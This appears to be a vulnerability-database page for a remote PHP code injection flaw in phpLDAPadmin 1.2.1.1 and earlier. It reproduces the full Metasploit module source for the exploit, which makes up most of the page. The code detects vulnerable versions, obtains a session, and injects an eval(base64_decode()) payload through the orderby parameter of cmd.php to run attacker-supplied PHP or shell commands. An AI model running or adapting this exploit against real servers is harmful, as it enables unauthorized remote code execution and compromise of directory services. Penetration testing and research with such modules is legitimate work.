phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType

phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection This module exploits a vulnerability in the lib/functions.php that allows attackers input parsed directly to the create_function() php function. A patch was issued that uses a whitelist regex expression to check the user supplied input before being parsed to the create_function() call


                                                ##
# $Id: phpldapadmin_query_engine.rb 14060 2011-10-25 05:25:39Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Payload::Php

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;phpLDAPadmin &#60;= 1.2.1.1 (query_engine) Remote PHP Code Injection&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a vulnerability in the lib/functions.php that allows
				attackers input parsed directly to the create_function() php function. A patch was 
				issued that uses a whitelist regex expression to check the user supplied input
				before being parsed to the create_function() call.
			},
			&#39;Author&#39;         =&#62;
				[ 
					&#39;EgiX &#60;n0b0d13s[at]gmail-com&#62;&#39;,               # original discovery/poc
					&#39;mr_me &#60;steventhomasseeley[at]gmail-com&#62;&#39;,    # msf
					&#39;TecR0c &#60;roccogiovannicalvi[at]gmail-com &#62;&#39;,  # msf
				],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 14060 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[&#39;BID&#39;, &#39;50331&#39;],
					[&#39;URL&#39;, &#39;http://sourceforge.net/support/tracker.php?aid=3417184&#39;],
					[&#39;URL&#39;, &#39;http://www.exploit-db.com/exploits/18021/&#39;],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;Payload&#39;        =&#62;
				{
					&#39;DisableNops&#39; =&#62; true,
					&#39;Space&#39;       =&#62; 4000,
					&#39;Keys&#39;        =&#62; [&#39;php&#39;],
				},
			&#39;Platform&#39;       =&#62; [&#39;php&#39;],
			&#39;Arch&#39;           =&#62; ARCH_PHP,
			&#39;Targets&#39;        =&#62; [[ &#39;Automatic&#39;, { }]],
			&#39;DisclosureDate&#39; =&#62; &#39;Oct 24 2011&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))

			register_options(
				[
					OptString.new(&#39;URI&#39;, [true, &#34;phpLDAPadmin directory path&#34;, &#34;/phpldapadmin/htdocs/&#34;]),
				], self.class)
	end

	def check
		uri = &#39;&#39;
		uri &#60;&#60; datastore[&#39;URI&#39;]
		uri &#60;&#60; &#39;/&#39; if uri[-1,1] != &#39;/&#39;
		uri &#60;&#60; &#39;index.php&#39;

		res = send_request_raw(
			{
				&#39;method&#39;  =&#62; &#39;GET&#39;,
				&#39;uri&#39; =&#62; uri,
			}, 3)

		if (res and res.body =~ /phpLDAPadmin \(1\.2\.[0|1]\.\d/i)
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def get_session
		uri = &#39;&#39;
		uri &#60;&#60; datastore[&#39;URI&#39;]
		uri &#60;&#60; &#39;/&#39; if uri[-1,1] != &#39;/&#39;
		uri &#60;&#60; &#39;index.php&#39;

		res = send_request_raw(
			{
				&#39;method&#39;  =&#62; &#39;GET&#39;,
				&#39;uri&#39; =&#62; uri,
			}, 3)

		if (not res.headers[&#39;Set-Cookie&#39;])
			print_error(&#34;Could not generate a valid session&#34;)
			return
		end

		return res.headers[&#39;Set-Cookie&#39;]
	end

	def cleanup
		# We may not be using php/exe again, so clear the CMD option
		if datastore[&#39;CMD&#39;]
			datastore[&#39;CMD&#39;] = nil
		end
	end

	def exploit
		# if we are using the exec CMD stager
		# important to check which php functions are disabled
		if datastore[&#39;CMD&#39;]
			cmd = Rex::Text.encode_base64(datastore[&#39;CMD&#39;])
			dis = &#39;$&#39; + Rex::Text.rand_text_alpha(rand(4) + 4)
			out = &#39;$&#39; + Rex::Text.rand_text_alpha(rand(4) + 4)
			shell = &#60;&#60;-END_OF_PHP_CODE
			$c = base64_decode(&#34;#{cmd}&#34;);
			#{php_preamble({:disabled_varname =&#62; dis})}
			#{php_system_block({:cmd_varname=&#62;&#34;$c&#34;, :disabled_varname =&#62; dis, :output_varname =&#62; out})}
			echo #{out};
			END_OF_PHP_CODE
			p = Rex::Text.encode_base64(Rex::Text.compress(shell))
		else
			p = Rex::Text.encode_base64(payload.encoded)
		end

		# Generate some random strings
		hidden_header = rand_text_alpha_upper(6)
		fake_func_name = rand_text_alpha_upper(2)

		# build sttack string
		php_code = &#34;#{fake_func_name}));}}error_reporting(0);eval(base64_decode(\$_SERVER[HTTP_#{hidden_header}]));die;/*&#34;
		data = &#34;cmd=query_engine&query=none&search=1&orderby=#{php_code}\r\n\r\n&#34;
		session = get_session

		uri = &#39;&#39;
		uri &#60;&#60; datastore[&#39;URI&#39;]
		uri &#60;&#60; &#39;/&#39; if uri[-1,1] != &#39;/&#39;
		uri &#60;&#60; &#39;cmd.php&#39;

		res = send_request_cgi(
			{
				&#39;method&#39; =&#62; &#39;POST&#39;,
				&#39;uri&#39; =&#62; uri,
				&#39;data&#39; =&#62; data,
				&#39;headers&#39; =&#62;
					{
						&#34;#{hidden_header}&#34; =&#62; p,
						&#39;Cookie&#39; =&#62; session,
						&#39;Connection&#39; =&#62; &#39;Close&#39;,
					},
				
			}, 3)

		print_status(&#34;%s&#34; % res.body) if datastore[&#39;CMD&#39;]
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1